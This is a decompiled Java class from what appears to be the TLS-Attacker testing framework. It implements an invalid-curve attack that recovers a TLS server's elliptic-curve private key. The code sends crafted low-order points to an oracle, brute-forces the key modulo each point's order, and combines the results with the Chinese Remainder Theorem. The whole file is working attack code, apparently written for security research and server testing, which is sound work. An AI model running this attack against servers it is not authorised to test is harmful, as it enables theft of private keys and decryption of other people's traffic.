/*
 * Decompiled with CFR 0.152.
 */
package de.rub.nds.tlsattacker.attacks.ec;

import de.rub.nds.modifiablevariable.util.ArrayConverter;
import de.rub.nds.tlsattacker.attacks.ec.ICEPoint;
import de.rub.nds.tlsattacker.attacks.ec.ICEPointReader;
import de.rub.nds.tlsattacker.attacks.ec.oracles.ECOracle;
import de.rub.nds.tlsattacker.core.constants.NamedGroup;
import de.rub.nds.tlsattacker.core.crypto.ec.CurveFactory;
import de.rub.nds.tlsattacker.core.crypto.ec.EllipticCurve;
import de.rub.nds.tlsattacker.core.crypto.ec.Point;
import de.rub.nds.tlsattacker.util.MathHelper;
import java.math.BigInteger;
import java.util.Arrays;
import java.util.LinkedList;
import java.util.List;
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

public class ICEAttacker {
    private static final Logger LOGGER = LogManager.getLogger();
    private final ServerType server;
    private final int oracleAdditionalEquations;
    private final ECOracle oracle;
    private final NamedGroup group;
    private final EllipticCurve curve;

    public ICEAttacker(ECOracle oracle, ServerType server, int oracleAdditionalEquations, NamedGroup group) {
        this.oracle = oracle;
        this.server = server;
        this.oracleAdditionalEquations = oracleAdditionalEquations;
        this.group = group;
        this.curve = CurveFactory.getCurve(group);
    }

    public BigInteger attack() {
        BigInteger result = null;
        long currentTime = System.currentTimeMillis();
        switch (this.server) {
            case NORMAL: {
                result = this.attackNormal();
                break;
            }
            case ORACLE: {
                result = this.attackOracle();
            }
        }
        LOGGER.info("Time needed for the attack: {} seconds", (Object)((System.currentTimeMillis() - currentTime) / 1000L));
        return result;
    }

    private BigInteger attackNormal() {
        List<ICEPoint> points = ICEPointReader.readPoints(this.group);
        LinkedList<BigInteger> congs = new LinkedList<BigInteger>();
        LinkedList<BigInteger> moduli = new LinkedList<BigInteger>();
        for (ICEPoint point : points) {
            BigInteger cong = this.getCongruence(point);
            if (cong != null) {
                BigInteger mod = BigInteger.valueOf(point.getOrder());
                BigInteger squareCong = cong.modPow(new BigInteger("2"), mod);
                congs.add(squareCong);
                moduli.add(mod);
                LOGGER.info("Successfully found: x = +/- " + cong + " mod " + point.getOrder());
                LOGGER.info("Using equation: x^2 =   " + squareCong + " mod " + point.getOrder());
                BigInteger prodModuli = this.computeModuliProduct(moduli);
                if (prodModuli.bitLength() <= this.curve.getModulus().bitLength() * 2) continue;
                LOGGER.info("We have found enough congruences for computing a CRT");
                break;
            }
            LOGGER.info("No congruence found for point with order " + point.getOrder());
        }
        BigInteger sqrtResult = MathHelper.CRT(congs, moduli);
        BigInteger result = MathHelper.bigIntSqRootFloor((BigInteger)sqrtResult);
        LOGGER.info("Result found: {}", (Object)result);
        LOGGER.info("Number of server queries: {}", (Object)this.oracle.getNumberOfQueries());
        return result;
    }

    private BigInteger attackOracle() {
        int lastElementPointer;
        BigInteger[] moduliArray;
        BigInteger[] congsArray;
        int[] usedOracleEquations;
        BigInteger result;
        List<ICEPoint> points = ICEPointReader.readPoints(this.group);
        LinkedList<BigInteger> congs = new LinkedList<BigInteger>();
        LinkedList<BigInteger> moduli = new LinkedList<BigInteger>();
        int additionalEquations = 0;
        for (int i = points.size() - 1; i >= 0; --i) {
            ICEPoint point = points.get(i);
            BigInteger cong = this.getCongruence(point);
            if (cong != null) {
                BigInteger mod = BigInteger.valueOf(point.getOrder());
                BigInteger squareCong = cong.modPow(new BigInteger("2"), mod);
                congs.add(squareCong);
                moduli.add(mod);
                LOGGER.info("Successfully found: x = +/- " + cong + " mod " + point.getOrder());
                LOGGER.info("Using equation: x^2 =   " + squareCong + " mod " + point.getOrder());
                BigInteger prodModuli = this.computeModuliProduct(moduli);
                if (prodModuli.bitLength() <= this.curve.getModulus().bitLength() * 2 + 4) continue;
                LOGGER.info("We have found enough congruences for computing a CRT, computing additional equations");
                if (additionalEquations == this.oracleAdditionalEquations) break;
                ++additionalEquations;
                continue;
            }
            LOGGER.info("No congruence found for point with order " + point.getOrder());
        }
        if ((result = this.bruteForceWithAdditionalOracleEquations(usedOracleEquations = this.initializeUsedOracleEquations(moduli.size() - this.oracleAdditionalEquations), congsArray = ArrayConverter.convertListToArray(congs), moduliArray = ArrayConverter.convertListToArray(moduli), lastElementPointer = usedOracleEquations.length - 1)) != null) {
            LOGGER.info("Result found: {}", (Object)result);
            LOGGER.info("Number of server queries: {}", (Object)this.oracle.getNumberOfQueries());
        } else {
            LOGGER.info("Unfortunately, no result found. Try to increase the number of additional equations.");
        }
        return result;
    }

    public BigInteger bruteForceWithAdditionalOracleEquations(int[] usedOracleEquations, BigInteger[] congs, BigInteger[] modulis, int pointer) {
        int minValue;
        int[] eq = Arrays.copyOf(usedOracleEquations, usedOracleEquations.length);
        int maxValue = pointer == usedOracleEquations.length - 1 ? congs.length : usedOracleEquations[pointer + 1];
        for (int i = minValue = usedOracleEquations[pointer]; i < maxValue; ++i) {
            eq[pointer] = i;
            if (pointer > 0) {
                this.bruteForceWithAdditionalOracleEquations(eq, congs, modulis, pointer - 1);
                continue;
            }
            LOGGER.debug("Trying the following combination: {}", (Object)Arrays.toString(eq));
            BigInteger sqrtResult = this.computeCRTFromCombination(usedOracleEquations, congs, modulis);
            BigInteger r = MathHelper.bigIntSqRootFloor((BigInteger)sqrtResult);
            LOGGER.info("Guessing the following result: {}", (Object)r);
            if (!this.oracle.isFinalSolutionCorrect(r)) continue;
            return r;
        }
        return null;
    }

    private BigInteger computeCRTFromCombination(int[] usedOracleEquations, BigInteger[] congs, BigInteger[] modulis) {
        BigInteger[] usedCongs = new BigInteger[usedOracleEquations.length];
        BigInteger[] usedModulis = new BigInteger[usedOracleEquations.length];
        for (int i = 0; i < usedOracleEquations.length; ++i) {
            usedCongs[i] = congs[usedOracleEquations[i]];
            usedModulis[i] = modulis[usedOracleEquations[i]];
        }
        return MathHelper.CRT((BigInteger[])usedCongs, (BigInteger[])usedModulis);
    }

    private int[] initializeUsedOracleEquations(int size) {
        int[] usedEquations = new int[size];
        for (int i = 0; i < usedEquations.length; ++i) {
            usedEquations[i] = i;
        }
        return usedEquations;
    }

    private BigInteger getCongruence(ICEPoint point) {
        BigInteger secretModOrder = BigInteger.ZERO;
        for (int i = 1; i < point.getOrder(); ++i) {
            Point guess = this.curve.mult(secretModOrder = secretModOrder.add(BigInteger.ONE), point);
            if (!this.oracle.checkSecretCorrectnes(point, guess.getX().getData())) continue;
            return secretModOrder;
        }
        return null;
    }

    private BigInteger computeModuliProduct(List<BigInteger> moduli) {
        BigInteger prodModuli = BigInteger.ONE;
        for (BigInteger mod : moduli) {
            prodModuli = prodModuli.multiply(mod);
        }
        return prodModuli;
    }

    public static enum ServerType {
        NORMAL,
        ORACLE;

    }
}

